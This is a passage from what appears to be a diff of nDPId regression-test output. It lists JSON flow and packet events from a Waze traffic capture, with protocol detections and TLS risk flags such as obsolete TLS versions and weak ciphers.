{"hostname":"roadshields.waze.com","url":"roadshields.waze.com\/images\/HD\/CH2.png","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} -00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":22,"source":"waze.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587868632,"flow_last_seen":1435587868910,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":83,"flow_tot_l4_payload_len":85,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1435587868910,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45529,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"roadshields.waze.com","url":"roadshields.waze.com\/images\/HD\/CH2.png","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} +00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"waze.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587868632,"flow_last_seen":1435587868906,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":83,"flow_tot_l4_payload_len":83,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1435587868906,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45529,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"roadshields.waze.com","url":"roadshields.waze.com\/images\/HD\/CH2.png","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} +00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":22,"source":"waze.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587868632,"flow_last_seen":1435587868910,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":83,"flow_tot_l4_payload_len":85,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1435587868910,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45529,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"roadshields.waze.com","url":"roadshields.waze.com\/images\/HD\/CH2.png","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"waze.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587868996,"flow_last_seen":1435587868996,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587868996,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.118.48","src_port":36585,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"waze.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1435587868996,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587868996,"pkt":"ABoRAAACABoRAAABCABFAAA8cVdAAEAGm2kKCAABrcJ2MI7pAburox1\/AAAAAKAC\/\/9UDAAAAgQFtAQCCAoACGwoAAAAAAEDAwg="} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"waze.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1435587868998,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587868998,"pkt":"ABoRAAACABoRAAABCABFAAAodHhAABAGyFytwnYwCggAAQG7julUXOKAq6MdgFAS\/\/\/xMQAA"} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"waze.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1435587869002,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587869002,"pkt":"ABoRAAACABoRAAABCABFAAAocVhAAEAGm3wKCAABrcJ2MI7pAburox2AVFzigVAQ\/\/\/xMgAA"} -00936{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"waze.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587868634,"flow_last_seen":1435587869002,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587869002,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36100,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"waze.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587868996,"flow_last_seen":1435587869054,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1435587869054,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.118.48","src_port":36585,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00936{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"waze.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587868635,"flow_last_seen":1435587869106,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587869106,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36102,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00979{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":38,"source":"waze.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587868996,"flow_last_seen":1435587869107,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1435587869107,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.118.48","src_port":36585,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"23f1f6e2f0015c166df49fdab4280370","unsafe_cipher":2,"cipher":"TLS_ECDHE_RSA_WITH_RC4_128_SHA"}} +00936{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"waze.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587868634,"flow_last_seen":1435587869002,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587869002,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36100,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"waze.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587868996,"flow_last_seen":1435587869054,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1435587869054,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.118.48","src_port":36585,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00936{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"waze.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587868635,"flow_last_seen":1435587869106,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587869106,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36102,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00979{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":38,"source":"waze.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587868996,"flow_last_seen":1435587869107,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1435587869107,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.118.48","src_port":36585,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"23f1f6e2f0015c166df49fdab4280370","unsafe_cipher":2,"cipher":"TLS_ECDHE_RSA_WITH_RC4_128_SHA"}} 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":49,"source":"waze.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587869162,"flow_last_seen":1435587869162,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587869162,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45536,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"waze.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1435587869162,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587869162,"pkt":"ABoRAAACABoRAAABCABFAAA8XmhAAEAGt7gKCAABNubjrLHgAFDjpDJQAAAAAKAC\/\/\/u\/QAAAgQFtAQCCAoACGw4AAAAAAEDAwg="} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"waze.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1435587869163,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587869163,"pkt":"ABoRAAACABoRAAABCABFAAAodIRAABAG0bA25uOsCggAAQBQseAcW82v46QyUVAS\/\/\/ZBQAA"} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"waze.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1435587869163,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587869163,"pkt":"ABoRAAACABoRAAABCABFAAAoXmlAAEAGt8sKCAABNubjrLHgAFDjpDJRHFvNsFAQ\/\/\/ZBgAA"} -00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"waze.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587869162,"flow_last_seen":1435587869165,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1435587869165,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45536,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/lang_asr\/lang.portuguese_br_asr","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} -00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":54,"source":"waze.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587869162,"flow_last_seen":1435587869166,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1435587869166,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45536,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/lang_asr\/lang.portuguese_br_asr","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} -01087{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":66,"source":"waze.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587868635,"flow_last_seen":1435587869425,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1012,"flow_tot_l4_payload_len":1194,"flow_avg_l4_payload_len":199,"midstream":0,"thread_ts_msec":1435587869425,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36102,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"714ac86d50db68420429ca897688f5f3","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA"}} -01341{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":67,"source":"waze.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587868634,"flow_last_seen":1435587869476,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3147,"flow_tot_l4_payload_len":3329,"flow_avg_l4_payload_len":554,"midstream":0,"thread_ts_msec":1435587869476,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36100,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"714ac86d50db68420429ca897688f5f3","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}} -01341{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":69,"source":"waze.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1435587868635,"flow_last_seen":1435587869477,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2135,"flow_tot_l4_payload_len":3329,"flow_avg_l4_payload_len":416,"midstream":0,"thread_ts_msec":1435587869477,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36102,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"714ac86d50db68420429ca897688f5f3","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}} -00929{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":92,"source":"waze.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587867755,"flow_last_seen":1435587871459,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":1631,"flow_avg_l4_payload_len":271,"midstream":0,"thread_ts_msec":1435587871459,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"65.39.128.135","src_port":54915,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"},"http": {"hostname":"xtra1.gpsonextra.net","url":"xtra1.gpsonextra.net\/xtra2.bin","code":200,"content_type":"application\/octet-stream","user_agent":"Android"}} +00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"waze.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587869162,"flow_last_seen":1435587869165,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1435587869165,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45536,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/lang_asr\/lang.portuguese_br_asr","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} +00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":54,"source":"waze.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587869162,"flow_last_seen":1435587869166,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1435587869166,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45536,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/lang_asr\/lang.portuguese_br_asr","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} +01087{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":66,"source":"waze.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587868635,"flow_last_seen":1435587869425,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1012,"flow_tot_l4_payload_len":1194,"flow_avg_l4_payload_len":199,"midstream":0,"thread_ts_msec":1435587869425,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36102,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"714ac86d50db68420429ca897688f5f3","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA"}} +01341{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":67,"source":"waze.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587868634,"flow_last_seen":1435587869476,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3147,"flow_tot_l4_payload_len":3329,"flow_avg_l4_payload_len":554,"midstream":0,"thread_ts_msec":1435587869476,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36100,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"714ac86d50db68420429ca897688f5f3","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}} +01341{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":69,"source":"waze.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1435587868635,"flow_last_seen":1435587869477,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2135,"flow_tot_l4_payload_len":3329,"flow_avg_l4_payload_len":416,"midstream":0,"thread_ts_msec":1435587869477,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36102,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"714ac86d50db68420429ca897688f5f3","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}} +00929{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":92,"source":"waze.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587867755,"flow_last_seen":1435587871459,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":1631,"flow_avg_l4_payload_len":271,"midstream":0,"thread_ts_msec":1435587871459,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"65.39.128.135","src_port":54915,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"},"http": {"hostname":"xtra1.gpsonextra.net","url":"xtra1.gpsonextra.net\/xtra2.bin","code":200,"content_type":"application\/octet-stream","user_agent":"Android"}} 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":100,"source":"waze.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587871656,"flow_last_seen":1435587871656,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587871656,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45538,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 